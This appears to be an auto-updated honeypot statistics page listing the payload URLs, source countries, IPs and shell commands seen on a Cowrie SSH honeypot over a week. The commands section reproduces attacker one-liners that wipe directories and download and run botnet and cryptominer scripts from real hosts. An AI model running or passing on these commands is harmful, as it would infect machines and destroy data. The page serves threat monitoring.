Weekly Statistics

The following are stats from a server running the Cowrie SSH honeypot. The tables below show the most common payloads and commands run after connecting to the honeypot, as well as the top IP addresses and countries.
This list is updataed hourly, compiling results over the previous week.

Payloads

PayloadCount
http://betaalverzoek.ir/binInfect.sh;982
http://188.213.49.167/x86_64;952
http://212.192.241.44/Gbotbins.sh;932
http://209.141.45.139/x86_64868
http://cnc.betaalverzoek.ir/binInfect.sh;691
http://1/holesofmyasshole.sh;673
http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh332
url=http://myfrance.xyz/poll/b74a3652-10d4-427e-8b70-ae6a132c4c89325
url=http://strtbiz.site/poll/b7d35cf6-4b12-415d-a4ec-2819939d7362250
http://23.95.96.55/0x83911d24Fx.sh;244
http://154.16.118.104/x86;88

Countries

CountryCount
Russia1152
United States1023
Poland937
Ukraine574
South Korea252

Connection IPs

Connected IPCount
5.188.62.2451142
5.188.62.2491142
5.188.62.2231142
5.188.62.2481118
5.188.62.2291038
107.189.31.2481018
193.169.254.234932
5.188.62.219921
107.189.12.48717
5.188.62.232676
45.144.225.199581
95.47.148.166573
209.141.51.168468
1.255.226.19252

Commands

Command RunCount
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; rm -rf *; wget http://betaalverzoek.ir/binInfect.sh; curl -O http://betaalverzoek.ir/binInfect.sh; chmod 777 binInfect.sh; sh binInfect.sh; tftp betaalverzoek.ir -c get binInfect.sh; chmod 777 binInfect.sh; sh binInfect.sh; tftp -r binInfect2.sh -g betaalverzoek.ir; chmod 777 binInfect2.sh; sh binInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 betaalverzoek.ir binInfect1.sh binInfect1.sh; sh binInfect1.sh; rm -rf binInfect.sh binInfect.sh binInfect2.sh binInfect1.sh; rm -rf *4974
sh4974
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget 209.141.57.111/ssh || curl -o ssh 209.141.57.111/ssh; tar xvf ssh; cd .ssh; chmod +x *; ./sshd; ./krane 1qaz@WSX4954
uname -a4954
nproc; uname -a4942
cd /tmp; rm -rf x86_64; wget http://188.213.49.167/x86_64; curl -O http://188.213.49.167/x86_64; chmod 777 *; ./x86_64 x86_64; wget http://188.213.49.167/i686; chmod 777 *; ./i686 i686; echo ur mama4913
yum install wget -y; apt install wget -y;cd /tmp || cd /run || cd /; wget http://212.192.241.44/Gbotbins.sh; chmod 777 Gbotbins.sh; sh Gbotbins.sh; tftp 212.192.241.44 -c get Gbottftp1.sh; chmod 777 Gbottftp1.sh; sh Gbottftp1.sh; tftp -r Gbottftp2.sh -g 212.192.241.44; chmod 777 Gbottftp2.sh; sh Gbottftp2.sh; rm -rf Gbotbins.sh Gbottftp1.sh Gbottftp2.sh; rm -rf *4886
/bin/busybox cat /bin/busybox4864
/bin/busybox TSUNAMI4864
linuxshell4864
shell4863
system4863
enable4863